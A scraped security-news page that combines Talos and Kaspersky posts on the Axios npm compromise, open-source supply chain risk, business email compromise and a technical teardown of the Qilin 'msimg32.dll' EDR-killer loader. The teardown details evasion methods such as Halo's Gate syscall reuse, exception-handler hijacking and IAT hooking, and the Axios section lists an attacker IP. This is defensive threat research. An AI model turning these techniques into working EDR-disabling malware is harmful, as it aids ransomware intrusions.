In the span of just a few weeks, we have observed a dizzying array of major supply chain attacks. Prominent examples include the malicious modification of Axios, a popular HTTP client library for JavaScript, as well as cascading compromises from TeamPCP, a “chaos-as-a-service” group that injected malicious code into hijacked GitHub repositories for open-source projects, including Trivy, an open-source security scanner.
The impact of these supply chain attacks can be vast. Axios receives 100 million downloads weekly and innumerable organizations rely on the frameworks and libraries compromised by TeamPCP. The headache they pose to organizations and their security personnel is considerable as well; affected utilities can be integrated so deeply that it may be difficult to fully catalog, let alone remediate.
Although the timing, scale, and severity of these attacks can be shocking, this is not a new phenomenon. The supply chain has remained an attractive target for some time because of its fragility and the fact that a successful compromise can lead to countless additional downstream victims.
Findings from the recently published Talos 2025 Year in Review illustrate these long-standing trends. Nearly 25% of the top 100 targeted vulnerabilities we observed in 2025 affect widely used frameworks and libraries. Digging deeper into the list reveals additional insights. The React2Shell vulnerability affecting React Server Components became the top-targeted vulnerability of 2025 despite being disclosed in December, reflecting the speed at which these supply chain attacks can reach massive scale. The presence of Log4j vulnerabilities shows how deeply embedded these utilities can be and therefore how difficult it can be to reduce the attack surface. Although these particular examples represent extant vulnerabilities that can be weaponized by numerous adversaries versus a deliberate attack carried out by a single adversary, they show how impactful and disruptive threats to the supply chain can be. Follow-on attacks can range from ransomware to espionage, which is reflective of the broad swath of adversaries that carry them out — from sophisticated state-sponsored groups to teenage cyber criminals.
If we are all building on such shaky foundation, what can we do to keep safe? After all, it certainly seems dire when a tool such as Trivy that we could normally use to scan for supply chain vulnerabilities becomes compromised itself. But there are concrete steps we can take to improve our security posture.
As highlighted in the Year in Review, protecting identity is key. This includes securing CI/CD pipelines to prevent these types of compromises from occurring in the first place, as well as limiting the impact and lateral movement of an adversary should they obtain access to a downstream victim.
In addition, organizations must try to the best of their abilities to inventory the software libraries and frameworks they employ, stay informed of security incidents, and respond rapidly to implement patching and other mitigations.
Just as supply chain attacks are evergreen, so too is the efficacy of security fundamentals, such as segmentation, robust logging, multi-factor authentication (MFA), and the implementation of emergency response plans.
As trust continues to break down, the only viable solution may be to double down on vigilance. Since this recent spate of attacks represents a trend that will likely only grow in intensity and breadth, the time for action and planning is now.
Coverage
Below, find a sample of the some of the recent coverage we offer to protect against these threats:
ClamAV: Txt.Trojan.TeamPCP-10059839-0
Txt.Trojan.TeamPCP-10059839-0
Behavioral Protections: LiteLLM Supply Chain Compromise – alerts during installation of compromised packages
https://www.backbox.org/wp-content/uploads/2018/09/website_backbox_text_black.png00adminhttps://www.backbox.org/wp-content/uploads/2018/09/website_backbox_text_black.pngadmin2026-04-03 19:06:402026-04-03 19:06:40Do not get high(jacked) off your own supply (chain)
Cisco Talos is actively investigating the March 31, 2026 supply chain attack on the official Axios node package manager (npm) package during which two malicious versions (v1.14.1 and v0.30.4) were deployed. Axios is one of the more popular JavaScript libraries with as many as 100 million downloads per week.
Axios is a widely-deployed HTTP client library for JavaScript that simplifies HTTP requests, specifically for REST endpoints. The malicious packages were only available for approximately three hours, but if downloaded Talos strongly encourages that all deployments should be rolled back to previous known safe versions (v1.14.0 or v0.30.3). Additionally, Talos strongly recommends users and administrators investigate any systems that downloaded the malicious package for follow-on payloads from actor-controlled infrastructure.
Details of supply chain attack
The primary modification of the packages introduced a fake runtime dependency (plain-crypto-js) that executes via post-install without any user interaction required. Upon execution, the dependency reaches out to actor-controlled infrastructure (142[.]11[.]206[.]73) with operating system information to deliver a platform-specific payload to Linux, MacOS, or Windows.
On MacOS, a binary, “com.apple.act.mond”, is downloaded and run using zsh. Windows is delivered a ps1 file, which copies the legitimate powershell executable to “%PROGRAM DATA%wt.exe”, and executes the downloaded ps1 file with hidden and execution policy bypass flags. On Linux, a Python backdoor is downloaded and executed. The payload is a remote access trojan (RAT) with typical associated capabilities allowing the actor to gather information and run additional payloads.
Impact
As with most supply chain attacks, the full impact will likely take some time to uncover. The threat actors exfiltrated credentials along with remote management capabilities. Therefore, Talos strongly recommends organizations treat any credentials present on their systems with the malicious package as compromised and begin the process of rotating them as quickly as possible. Actors are likely to try to weaponize access as quickly as possible to maximize financial gain.
Supply chain attacks tend to have unexpected downstream impacts, as these packages are widely used across a variety of applications, and the compromised credentials can be leveraged in follow-on attacks. For additional context, about 25% of the top 100 vulnerabilities in the Cisco Talos 2025 Year in Review affect widely used frameworks and libraries, highlighting the risk of supply chain-style attacks.
Talos will continue to monitor any follow-on impacts from this supply chain attack in the days and weeks ahead, as well as any additional indicators that are uncovered as a result of our ongoing investigation.
As we already talked in a previous post, modern software development is practically unthinkable without the use of open-source components. But in recent years the associated risks have become increasingly diverse, complex, and numerous. When, first, vulnerabilities affect a company’s infrastructure and code faster than they’re remediated; second, data is unreliable and incomplete; and third, malware may be lurking within popular components, it’s not enough to simply scan version numbers and toss fix-it tickets at the IT team. Vulnerability management must be expanded to cover software download policies, guardrails for AI assistants, and the entire software build pipeline.
A trusted pool of open-source components
The main part of the solution is to prevent the use of vulnerable and malicious code. The following measures should be implemented:
Having an internal repository of artifacts. The sole source of components for internal development needs to be a unified repository to which components are admitted only after a series of checks.
Performing rigorous component screening. These include checks of: known versions of the component, known vulnerable and malicious versions, publication date, activity history, and the reputation of the package and its authors. Scanning the entire contents of the package, including build instructions, test cases, and other auxiliary data, is mandatory. To filter the registry during ingestion, use specialized open-source scanners or a comprehensive cloud workload security solution.
Running dependency pinning. Build processes, AI tools, and developers mustn’t use templates (such as “latest”) when specifying versions. Project builds need to be based on verified versions. At the same time, pinned dependencies must be regularly updated to the latest verified versions that maintain compatibility and are free of known vulnerabilities. This significantly reduces the risk of supply chain attacks through the compromise of a known package.
Improving vulnerability data
To identify vulnerabilities more effectively and prioritize them properly, an organization needs to establish several IT and security processes:
Vulnerability data enrichment. Depending on the organization’s needs, this is needed either to enrich information by combining data from NVD, EUVD, BDU, GitHub Advisory Database, and osv.dev, or to purchase a commercial vulnerability intelligence feed where the data is already aggregated and enriched. In either case, it’s worth additionally monitoring threat intelligence feeds to track real-world exploitation trends and gain an insight into the profile of attackers targeting specific vulnerabilities. Kaspersky provides a specialized data feed specifically focused on open-source components.
In-depth software composition analysis. Specialized software composition analysis (SCA) tools allow for the correct navigation of the dependency chain in open-source code to fully inventory the libraries being used, and discover outdated or unsupported components. Data on healthy components also comes in handy to enrich the artifact registry.
Identifying abandonware. Even if a component isn’t formally vulnerable and hasn’t been officially declared unsupported, the scanning process should flag components that haven’t received updates for more than a year. These warrant separate analysis and potential replacement, much like EOL components.
Securing AI code and AI agents
The activities of AI systems used in coding must be wrapped in a comprehensive set of security measures — from input data filtering to user training:
Restrictions on dependency recommendations. Configure the development environment to make sure that AI agents and assistants can only reference components and libraries from the trusted artifact registry. If these don’t contain the right tools, the model should trigger a request to include the dependency in the registry, rather than pulling something from PyPI that simply matches the description.
Filter model outputs. Despite these restrictions, anything generated by the model must also be verified to ensure the AI code doesn’t contain outdated, unsupported, vulnerable, or made-up dependencies. This check should be integrated directly into the code acceptance process or the build preparation stage. It doesn’t replace the traditional static analysis process: SAST tools must still be embedded in the CI/CD pipeline.
Developer training. IT and security teams must be intimately familiar with the characteristics of AI systems, their operating principles, and common errors. To achieve this, employees should complete a specialized training course tailored to their specific roles.
Systematic removal of EOL components
If a company’s systems utilize outdated open-source components, a systematic, consistent approach to addressing their vulnerabilities should be taken. There are three primary methods for doing this:
Migration. This is the most organizationally complex and expensive method, involving the total replacement of a component followed by the adaptation, rewriting, or replacement of the applications built upon it. Deciding on a migration is especially daunting when it demands a massive overhaul of all internal code. This frequently affects core components — it’s impossible to migrate away from Node.js 14 or Python 2 easily.
Long-term support (LTS). A dedicated support-services market exists for large-scale legacy projects. Sometimes this involves a fork of the legacy system maintained by third-party developers; in other cases, specialized teams backport patches that fix specific vulnerabilities into older, unsupported versions. Transitioning to LTS generally requires ongoing support costs, but this can still be more cost-effective than a full migration in many cases.
Security, IT, and business must work together to choose one of these three paths for every documented EOL or abandoned component, and reflect the made choice in the company’s asset registries and SBOMs.
Risk-based open-source vulnerability management
All of the measures listed above reduce the volume of vulnerable software and components entering the organization, and simplify the detection and remediation of flaws. Despite this, it’s impossible to eliminate every single defect: the number of applications and components is simply growing too fast.
Therefore, prioritizing vulnerabilities based on real-world risk remains essential. The risk assessment model must be expanded to account for the characteristics of open source, answering the following questions:
Is the vulnerable code branch actually executed in the organization’s environment? A reachability analysis for discovered vulnerabilities should be performed. Many defective code snippets are never actually run within the organization’s specific implementation, making the vulnerability impossible to exploit. Certain SCA solutions can perform this analysis. This same process permits evaluating an alternative scenario: what happens if the vulnerable procedures or components are removed from the project entirely? Sometimes, this method of remediation proves to be surprisingly painless.
Is the defect being exploited in real-world attacks? Is a PoC available? The answers to these questions are part of standard prioritization frameworks like EPSS, but tracking must be conducted across a much broader set of intelligence sources.
Has cybercriminal activity been reported in this dependency registry, or in related and similar components? These are additional factors for prioritization.
Considering these factors allows the team to allocate resources effectively and remediate the most dangerous defects first.
Transparency is the new black
The security bar for open-source software is only going to keep on rising. Companies developing applications — even for internal use — will face regulatory pressures demanding documented and verifiable cybersecurity within their systems. According to the estimates of Sonatype experts, 90% of companies globally already fall under one or more requirements to provide evidence of the reliability of the software they use; therefore, the experts deem transparency “the currency of software supply chain security”.
By controlling the use of open-source components and applications, enriching threat intelligence, and strictly monitoring AI-driven development systems, organizations can introduce the innovations the business craves — all while clearing the high bar set by regulators and customers alike.
https://www.backbox.org/wp-content/uploads/2018/09/website_backbox_text_black.png00adminhttps://www.backbox.org/wp-content/uploads/2018/09/website_backbox_text_black.pngadmin2026-04-03 17:06:362026-04-03 17:06:36Managing open-source vulnerabilities | Kaspersky official blog
It used to be that only specialized software houses and tech giants had to lose sleep over open-source vulnerabilities and supply chain attacks. But times have changed. Today, even small businesses are running their own development shops, making the problem relevant for everyone. Every second company’s internal IT teams are busy writing code, configuring integrations, and automating workflows — even if its core business has absolutely nothing to do with software. It’s what modern business efficiency demands. However, the byproduct of that is a new breed of software vulnerabilities — the kind that are far more complicated to fix than just installing the latest Windows update.
Modern software development is inseparable from open-source components. However, the associated risks have proliferated in recent years, increasing in both variety and sophistication. We’re seeing malicious code injected into popular repositories, fragmented and flawed vulnerability data, systematic use of outdated, vulnerable components, and increasingly complex dependency chains.
The open-source vulnerability data shortage
Even if your organization has a rock-solid vulnerability management process for third-party commercial software, you’ll find that open-source code requires a complete overhaul of that process. The most widely used public databases are often incomplete, inaccurate, or just plain slow to get updates when it comes to open source. This turns vulnerability prioritization into a guessing game. No amount of automation can help you if your baseline data is full of holes.
According to data from Sonatype, about 65% of open-source vulnerabilities assigned a CVE ID lack a severity score (CVSS) in the NVD — the most widely used vulnerability knowledge base. Of those unscored vulnerabilities, nearly 46% would actually be classified as High if properly analyzed.
Even when a CVSS score is available, different sources only agree on the severity about 55% of the time. One database might flag a vulnerability as Critical, while another assigns a Medium score to it. More detailed metadata like affected package versions is often riddled with errors and inconsistencies too. Your vulnerability scanners that compare software versions end up crying wolf with false positives, or falsely giving you a clean bill of health.
The deficit in vulnerability data is growing, and the reporting process is slowing down. Over the past five years, the total number of CVEs has doubled, but the number of CVEs lacking a severity score has exploded by a factor of 37. According to Tenable, by 2025, public proof-of-concept (PoC) exploit code was typically available within a week of a vulnerability’s discovery, but getting that same vulnerability listed in the NVD took an average of 15 days. Enrichment processes, such as assigning a CVSS score, are even slower — Sonatype in the same study estimates that the median time to assign a CVSS score is 41 days, with some defects remaining unrated for up to a year.
The legacy open-source code problem
Libraries, applications, and services that are no longer maintained — either being abandoned or having long reached their official end of life (EOL) — can be found in 5 to 15% of corporate projects, according to HeroDevs. Across five popular open-source code registries, there are at least 81 000 packages that contain known vulnerabilities but belong to outdated, unsupported versions. These packages will never see official patches. This “legacy baggage” accounts for about 10% of packages in Maven Central and PyPI, and a staggering 25% in npm.
Using this kind of open-source code breaks the standard patch management lifecycle: you can’t update, automatically or manually, a dependency that is no longer supported. Furthermore, when EOL versions are omitted from official vulnerability bulletins, security scanners may categorize them as “not affected” by a defect and ignore them.
A prime example of this is Log4Shell, the critical (CVSS 10) vulnerability in the popular Log4j library discovered back in 2021. The vulnerable version accounted for 40 million out of 300 million Log4j downloads in 2025. Keep in mind that we’re talking about one of the most infamous and widely reported vulnerabilities in history — one that was actively exploited, patched by the developer, and addressed in every major downstream product. The situation for less publicized defects is significantly worse.
Compounding this issue is the visibility gap. Many organizations lack the tools necessary to map out a complete dependency tree or gain full visibility into the specific packages and versions embedded within their software stack. As a result, these outdated components often remain invisible, never even making it into the remediation queue.
Malware in open-source registries
Attacks involving infected or inherently malicious open-source packages have become one of the fastest-growing threats to the software supply chain. According to Kaspersky researchers, approximately 14 000 malicious packages were discovered in popular registries by the end of 2024, a 48% year-over-year increase. Sonatype reported an even more explosive surge throughout 2025 — detecting over 450 000 malicious packages.
The motivation behind these attacks varies widely: cryptocurrency theft, harvesting developer credentials, industrial espionage, gaining infrastructure access via CI/CD pipelines, or compromising public servers to host spam and phishing campaigns. These tactics are employed by both spy APT groups and financially motivated cybercriminals. Increasingly, compromising an open-source package is just the first step in a multi-stage corporate breach.
Common attack scenarios include compromising the credentials of a legitimate open-source package maintainer, publishing a “useful” library with embedded malicious code, or publishing a malicious library with a name nearly identical to a popular one. A particularly alarming trend in 2025 has been the rise of automated, worm-like attacks. The most notorious example is the Shai-Hulud campaign. In this case, malicious code stole GitHub and npm tokens and kept infecting new packages, eventually spreading to over 700 npm packages and tens of thousands of repositories. It leaked CI/CD secrets and cloud access keys into the public domain in the process.
While this scenario technically isn’t related to vulnerabilities, the security tools and policies required to manage it are the same ones used for vulnerability management.
How AI agents increase the risks of open-source code usage
The rushed, ubiquitous integration of AI agents into software development significantly boosts developer velocity — but it also amplifies any error. Without rigorous oversight and clearly defined guardrails, AI-generated code is exceptionally vulnerable. Research shows that 45% of AI-generated code contains flaws from the OWASP Top 10, while 20% of deployed AI-driven applications harbor dangerous configuration errors. This happens because AI models are trained on massive datasets that include large volumes of outdated, demonstrational, or purely educational code. These systemic issues resurface when an AI model decides which open-source components to include in a project. The model is often unaware of which package versions currently exist, or which have been flagged as vulnerable. Instead, it suggests a dependency version pulled from its training data — which is almost certainly obsolete. In some cases, models attempt to call non-existent versions or entirely hallucinated libraries. This opens the door to dependency confusion attacks.
In 2025, even leading LLMs recommended incorrect dependency versions — simply making up an answer — in 27% of cases.
Can AI just fix everything?
It’s a simple, tempting idea: just point an AI agent at your codebase and let it hunt down and patch every vulnerability. Unfortunately, AI can’t fully solve this problem. The fundamental hurdles we’ve discussed handicap AI agents just as much as human developers. If vulnerability data is missing or unreliable, then instead of finding known vulnerabilities, you’re forced to rediscover them from scratch. That’s an incredibly resource-intensive process requiring niche expertise that remains out of reach for most businesses.
Furthermore, if a vulnerability is discovered in an obsolete or unsupported component, an AI agent cannot “auto-fix” it. You’re still faced with a need to develop custom patches or execute a complex migration. If a flaw is buried deep within a chain of dependencies, AI is likely to overlook it entirely.
What to do?
To minimize the risks described above, it will be necessary to expand the vulnerability management process to include open-source package download policies, AI assistant operating rules, and the software build process. This includes:
https://www.backbox.org/wp-content/uploads/2018/09/website_backbox_text_black.png00adminhttps://www.backbox.org/wp-content/uploads/2018/09/website_backbox_text_black.pngadmin2026-04-02 21:06:362026-04-02 21:06:36Risks, emerging when developing or using open-source software
Welcome to this week’s edition of the Threat Source newsletter.
Last weekend, I witnessed a crime. Not a notable crime that you might read about in the press, but an unremarkable fraud attempt that nevertheless illustrates how new threat actor capabilities are emerging.
I imagine that most people reading this probably field IT questions from friends, family, and your local community. I assist with the IT provision for a local community association. It’s not a wealthy, large association — just your typical volunteer-run nonprofit like many others in the region providing community services.
This weekend, the chair emailed the treasurer requesting a bank transfer. The treasurer replied asking for the recipient’s details, and the chair promptly responded. The emails appeared authentic: correct names, a sum consistent with the association’s regular expenditure. Yet something made the treasurer pause. The reason for the transfer felt vague, and the tone seemed slightly off. They picked up the phone to verify. The chair had no idea what they were talking about. The emails and the request were an attempted fraud by a third party.
This is a variant of the business email compromise (BEC) scam in which an attacker impersonates a trusted individual and requests a fund transfer to an account they control. The attacker relies on social engineering to trick someone with payment authority to send the money. Once received, funds typically pass through money mules or compromised personal accounts before being rapidly shuffled through multiple transfers, obscuring the trail and drastically reducing the chances of recovery.
The initial email is often sent from a plausible email address. Closely scrutinising the sender’s email address may not help, since the attack may originate from the sender’s genuine account that has previously been compromised.
Historically, BEC targeted large organisations where anticipated payouts justified the time investment required to research key personnel and craft targeted attacks. The anticipated payout would more than cover the costs involved.
However, the fact that attackers are willing to target a small community organisation for a relatively small sum of money shows that the economics of the attack have changed.
AI has fundamentally altered the economics of BEC. Attackers can now reconnoitre many small organisations rapidly and cheaply. AI-generated content can be tailored to each target: referencing specific projects, using appropriate terminology, matching organisational tone.
The attack no longer needs to be labour-intensive or highly targeted. It’s become democratised, and an accessible playbook for targeting any organisation. Community associations, local charities, or small businesses can now be targeted, both because the attack is easier to execute, but also because scamming smaller sums from many victims can be as profitable as scamming large sums from few victims. Unfortunately, because this profile of organisation may never have encountered this threat before, they may be unaware and consequently more vulnerable.
For every treasurer who pauses when something doesn’t quite feel right, there are others who will accept an apparently legitimate email at face value. Protection begins with awareness of how the fraud operates. Be suspicious of any unexpected request for payment, especially if there is a sense of urgency or reasons why a phone call “isn’t possible” right now. Verify through separate channels before any transfer occurs. Call a known number for your contact, not one provided in the suspicious email. Enforce strict procurement rules that prevent any last-minute urgent payments.
Above all, recognise the democratisation of business email compromise scams. They’re no longer something that only happens to large corporations with complex supply chains and international operations. They’re for everyone now.
The one big thing
Cisco Talos has identified a large-scale automated credential harvesting campaign that exploits React2Shell, a remote code execution vulnerability in Next.js applications (CVE-2025-55182). Using a custom framework called “NEXUS Listener,” the attackers automatically extract and aggregate sensitive data — including cloud tokens, database credentials, and SSH keys — from hundreds of compromised hosts to facilitate further malicious activity.
Why do I care?
This campaign uses high-speed automation to exploit React2Shell, enabling attackers to rapidly harvest high-value credentials and establish persistent, unauthenticated access. This creates significant risks for lateral movement and supply chain integrity. Furthermore, the centralized aggregation of stolen data allows attackers to map infrastructure for targeted follow-on attacks and potential data breaches.
So now what?
Organizations should immediately audit Next.js applications for the React2Shell vulnerability and rotate all potentially compromised credentials, including API keys and SSH keys. Enforce IMDSv2 on AWS instances and implement RASP or tuned WAF rules to detect malicious payloads. Finally, apply strict least-privilege access controls within container environments to limit the potential impact of a compromise.
F5 BIG-IP DoS flaw upgraded to critical RCE, now exploited in the wild The US cybersecurity agency CISA on Friday warned that threat actors have been exploiting a critical-severity F5 BIG-IP vulnerability in the wild. (SecurityWeek)
EuropeanCommission investigating breach after Amazon cloud account hack The threat actor told BleepingComputer that they will not attempt to extort the Commission using the allegedly stolen data, but intend to leak it online at a later date. (BleepingComputer)
Google fixes fourth Chrome zero-day exploited in attacks in 2026 As detailed in the Chromium commit history, this vulnerability stems from a use-after-free weakness in Dawn, the underlying cross-platform implementation of the WebGPU standard used by the Chromium project. (BleepingComputer)
Anthropic inadvertently leaks source code for Claude Code CLI tool Anthropic quickly removed the source code, but users have already posted mirrors on GitHub. They are actively dissecting the code to understand the tool’s inner workings. (Cybernews)
Can’t get enough Talos?
Qilin EDR killer infection chain Take a deep dive into the malicious “msimg32.dll” used in Qilin ransomware attacks, which is a multi-stage infection chain targeting EDR systems. It can terminate over 300 different EDR drivers from almost every vendor in the market.
An overview of 2025 ransomware threats in Japan In 2025, the number of ransomware incidents increased compared to 2024. Notably, it was a year in which attacks leveraging Qilin ransomware were observed most frequently.
A discussion on what the data means for defenders To unpack the biggest Year in Review takeaways and what they mean for security teams, we brought together Christopher Marshall, VP of Cisco Talos, and Peter Bailey, SVP and GM of Cisco Security.
When attackers become trusted users The latest TTP draws on 2025 Year in Review data to explore how identity is being used to gain, extend, and maintain access inside environments.
https://www.backbox.org/wp-content/uploads/2018/09/website_backbox_text_black.png00adminhttps://www.backbox.org/wp-content/uploads/2018/09/website_backbox_text_black.pngadmin2026-04-02 19:06:342026-04-02 19:06:34The democratisation of business email compromise fraud
https://www.backbox.org/wp-content/uploads/2018/09/website_backbox_text_black.png00adminhttps://www.backbox.org/wp-content/uploads/2018/09/website_backbox_text_black.pngadmin2026-04-02 15:06:382026-04-02 15:06:38[Video] The TTP Ep 21: When Attackers Become Trusted Users
Endpoint detection and response (EDR) tools are widely deployed and far more capable than traditional antivirus. As a result, attackers use EDR killers to disable or bypass them.
Disabling telemetry collection (process, memory, network activity) limits what defenders can see and analyze.
As defenders improve behavioral detection, attackers increasingly target the defense layer itself as part of their initial access or early execution stages.
This blog provides an in-depth analysis of the malicious “msimg32.dll” used in Qilin ransomware attacks, which is a multi-stage infection chain targeting EDR systems. It can terminate over 300 different EDR drivers from almost every vendor in the market.
We present multiple techniques used by the malware to evade and ultimately disable EDR solutions, including SEH/VEH-based obfuscation, kernel object manipulation, and various API and system call bypass methods.
This blog post provides an in-depth technical analysis of the malicious dynamic-link library (DLL) “msimg32.dll”, which Cisco Talos observed being deployed in Qilin ransomware attacks. The broader activities and attacks of Qilin was previously introduced and described in the blog post here.
This DLL represents the initial stage of a sophisticated, multi-stage infection chain designed to disable local endpoint detection and response (EDR) solutions present on compromised systems. Figure 1 shows a high-level diagram demonstrating the overall execution flow of this infection chain.
Figure 1. Infection chain overview.
The first stage consists of a PE loader responsible for preparing the execution environment for the EDR killer component. This secondary payload is embedded within the loader in an encrypted form.
The loader implements advanced EDR evasion techniques. It neutralizes user-mode hooks and suppresses Event Tracing for Windows (ETW) event generation at runtime by leveraging a -like approach. Additionally, it makes extensive use of structured exception handling (SEH) and vectored exception handling (VEH) to obscure control flow and conceal API invocation patterns. This enables the EDR killer payload to be decrypted, loaded, and executed entirely in memory without triggering detection by the locally installed EDR solution.
Once active, the EDR killer component loads two helper drivers. The first driver (“rwdrv.sys”) provides access to the system’s physical memory, while the second driver (“hlpdrv.sys”) is used to terminate EDR processes. Prior to loading the second driver, the EDR killer component unregisters monitoring callbacks established by the EDR, ensuring that process termination can proceed without interference.
Overall, the malware is capable of disabling over 300 different EDR drivers across a wide range of vendors. While the campaign has been previously reported by , , and others at a higher level, this analysis focuses on previously undocumented technical details of the infection chain (e.g., the SEH/VEH tricks and the overwriting of certain kernel objects).
PE loader section (“msimg32.dll”)
The malicious DLL is most likely side-loaded by a legitimate application that imports functions from “msimg32.dll”. To preserve expected functionality, the original API calls are forwarded to the legitimate library located in “C:WindowsSystem32”.
The version of “msimg32.dll” deployed by the threat actor triggers its malicious logic from within its DllMain function. As a result, the payload is executed as soon as the legitimate application loads the DLL.
Figure 2. Malicious version of “msimg32.dll”.
Sophos also gave some technical and historical insights into this loader in their earlier blog, in which it is referred to as Shanya.
Initialization phase
During initialization, the loader allocates a heap buffer in process memory that acts as a slot-policy table.
Figure 3a. Allocating buffer for slot-policy table.
The size of this buffer is computed as “ntdll.dll” OptionalHeader.SizeOfCode divided by 16 ( SizeOfCode >> 4), resulting in one byte per 16-byte code slot covering the code region as defined by OptionalHeader.SizeOfCode (typically the .text range). Each entry in the table corresponds to a fixed 16-byte block relative to BaseOfCode.
The loader then iterates over the export table of “ntdll.dll”. For each exported function whose name begins with “Nt”, the virtual address of the corresponding syscall stub is resolved. From this address, a slot index is calculated as: slot_idx = (FuncVA – BaseOfCode)/16
This index is used to mark the corresponding entry in the slot-policy table. All Nt* stubs are assigned a default policy, while selected functions are explicitly marked with special policies, including:
NtTraceEvent
NtTraceControl
NtAlpcSendWaitReceivePort
The result is a data-driven classification of relevant syscall stubs without modifying the executable code of “ntdll.dll”. The resulting slot-policy-table appears as follows:
Figure 3b. Slot-policy table.
The actual loader function is significantly more complex and incorporates additional obfuscation techniques, such as hash-based API resolution at runtime.
After constructing the table, the sample dynamically resolves ntdll!LdrProtectMrdata, which will be discussed in greater detail later. It then invokes this routine to change the protection of the .mrdata section to writable. This section contains the exception dispatcher callback pointer along with other critical runtime data.
Once the section is writable, the loader overwrites the dispatcher slot with its own custom exception handler. As a result, its routine is executed whenever an exception is triggered.
Figure 5. Overwriting of exception handler dispatcher slot.
Runtime exception handling
This function primarily performs two tasks: handling breakpoint exceptions and single-step exceptions.
The handling of breakpoint exceptions (0xCC) is relatively straightforward. It simply resumes execution at the instruction immediately following the INT3 (0xCC). Talos is not certain why this approach was implemented. It may function as a lightweight anti-emulation, anti-analysis, or anti-sandbox mechanism for weak analysis systems, serve as groundwork for more advanced anti-debugging techniques, or act as preparation for future control-flow manipulation similar to the VEH-based logic observed in Stages 2 and 3.
Figure 6. Breakpoint logic of hook_function_ExceptionCallback function.
The single-step portion of the function is significantly more complex and is where the previously introduced slot-policy table is utilized. ctx->ntstub_class_map points to the map buffer allocated during initialization.
Figure 7. Single step logic of hook_function_ExceptionCallback function.
Simplified the logic of the initialization and dispatch function looks like this in pseudo code. InitCtxAndPatchNtdllMrdataDispatch is the initialization function and hook_function_ExceptionCallback is the dispatch function mentioned above.
Figure 8. Simplified single step SEH logic.
The find_syscall routine shown in Figure 7 implements a syscall recovery technique. Details can be found in the picture below. It scans both backward and forward through “ntdll.dll” to locate intact syscall stubs and identify neighboring syscalls that can be repurposed.
The simplified logic is as follows:
Indirectly determine the target syscall number by scanning forward and backward.
Locate a clean neighbouring stub.
Manually load the correct syscall ID into eax.
Transition directly to kernel mode using the syscall instruction (i.e., a syscall instruction located inside a clean neighboring stub).
By reusing a neighboring syscall stub to invoke the desired system call, the loader bypasses EDR-hooked syscalls without modifying the hooked code itself. The Windows kernel only evaluates the syscall ID in eax; it does not verify which exported API function initiated the call.
Figure 9. Halo’s Gate: find_syscall function.
As previously mentioned, the actual code of the malware is more complex (e.g., the aforementioned runtime resolution of ntdll!LdrProtectMrdata).
Figure 10. Resolution of ntdll!LdrProtectMrdata at runtime.
The loader resolves the ntdll!LdrProtectMrdata function in a stealthy way. Instead of resolving LdrProtectMrdata by name or hash, the loader instead:
Finds the .mrdata section in the “ntdll.dll” image
Checks whether the current dispatcher slot pointer (dispatch_slot) lies inside .mrdata
If it does, it uses a known exported ntdll function (RtlDeleteFunctionTable, located via hash) as an anchor
From that anchor, it scans for a CALL rel32 instruction (0xE8) and extracts its target address
That call target is the address of LdrProtectMrdata and stored in ctx->LdrProtectMrdata
The initialization routine described earlier also incorporates several basic anti-debugging measures. For example, it verifies whether a breakpoint has been placed on KiUserExceptionDispatcher. If such a breakpoint is detected, the process is deliberately crashed. This check is performed before the dispatcher is overwritten, which means that the resulting exception is handled by the original, default exception handler.
The loader also implements geo-fencing. It excludes systems configured for languages commonly used in post-Soviet countries. This check is performed at an early stage, and the loader terminates if a locale from the exclusion list is detected.
Figure 12. Geo-fencing function.Figure 13. Geo-fencing excluded countries list.
After initializing Stage 1, the loader proceeds to unpack the subsequent stages. It creates a paging file-backed section and maps two views of this section into the process address space. This aspect was not analyzed in depth; however, creating two views of the same section is a common malware technique used to obscure a READ-WRITE-EXECUTABLE memory region. Typically, one view is configured with WRITE access only, masking the effective executable permissions of the underlying section. This shared memory region will contain subsequent malware stages after unpacking them. This also makes it more difficult to dump the memory during analysis. When a virtual memory page is not currently present in RAM (present bit cleared), accessing it triggers a page fault. The kernel then resolves the fault (e.g., by loading the page from the pagefile into physical memory).
Figure 14. CreateFileMappingA resolver function, returns the handle 0x174.Figure 15. First “write only” view, FILE_MAP_WRITE (0x2).Figure 16. Second “R-W-X” view, 0x24 = FILE_MAP_READ (0x4) | FILE_MAP_EXECUTE (0x20).
After creating the views, it copies and decodes bytes into this buffer. The basic block highlighted in green marks the start of this routine, while the red basic block represents the final control transfer (see Figure 17) to the decoded payload. The yellow basic block contains the decision logic that determines when execution transitions to the red basic block.
Figure 17. Stage 2 decoding routine.
Inside the red basic block, we have the final jump into the decoded bytes of Stage 2.
Figure 18. Call to Stage 2 in red basic block.
Stage 2
Stage 2 (0x2470000) serves solely as a stealthy transition mechanism to transfer execution to Stage 3. As expected, all addresses referenced from this point onward, such as 0x2470000, may vary between executions of the loader, as they are dynamically allocated at runtime.
The initial part of Stage 2 is straightforward: It decodes the data stored in the memory section and then unmaps the previously mapped view. The subsequent function call constitutes the critical step: ctx->FuncPtrHookIAT((ULONGLONG)ctx->hooking_func);
This IAT-hooking routine overwrites the ExitProcess entry in the Import Address Table (IAT) of the main process (i.e., the process that loaded the malicious “msimg32.dll”).
Figure 21. Overwritten IAT pointer to ExitProcess at 0x140017138.
As shown in Figure 18, execution returns normally from Stage 2, and DllMain completes without any obvious anomalies. The malicious logic is triggered later, when ExitProcess is invoked by exit_or_terminate_process during process termination. Instead of terminating the process, execution is redirected to function 0x2471000, which corresponds to Stage 3.
Stage 3
Stage 3 primarily decompresses and loads a PE image from memory that was originally embedded within the malicious “msimg32.dll”. It begins by resolving syscall stubs, which are used in subsequent code sections followed by decoding routines.
Figure 22. Syscall resolution and execution of certain functions.
After several decoding and preparation steps, the PE image is decompressed from memory.
After the PE image has been decompressed, the final routine responsible for preparing, loading, and ultimately executing the PE can be found at 0x24A2CE7 in this run.
Figure 25. Final load and execution of the embedded PE.
The fix_and_load_PE_set_VEH function begins by mapping “shell32.dll” into the process address space using NtCreateFile, NtCreateSection, and MapViewOfFile. It then overwrites the in-memory contents of “shell32.dll” with the previously loaded PE image.
Figure 26. Load “shell32.dll” into memory.
After copying the embedded and decoded PE image into memory, the code manually applies base relocations.
Figure 27. PE relocation.
After preparing the PE for in-memory execution, the loader employs a technique similar to Stage 2, but this time leveraging a vectored exception handler (VEH). After registering the VEH, it triggers the handler by setting a hardware breakpoint on ntdll!NtOpenSection. To indirectly invoke NtOpenSection, the loader subsequently loads a fake DLL via a call to the LdrLoadDll API. It appears that the malware author intentionally chose a name referencing a well-known security researcher, likely as a provocative touch.
Figure 28. Call to LdrLoadDll.
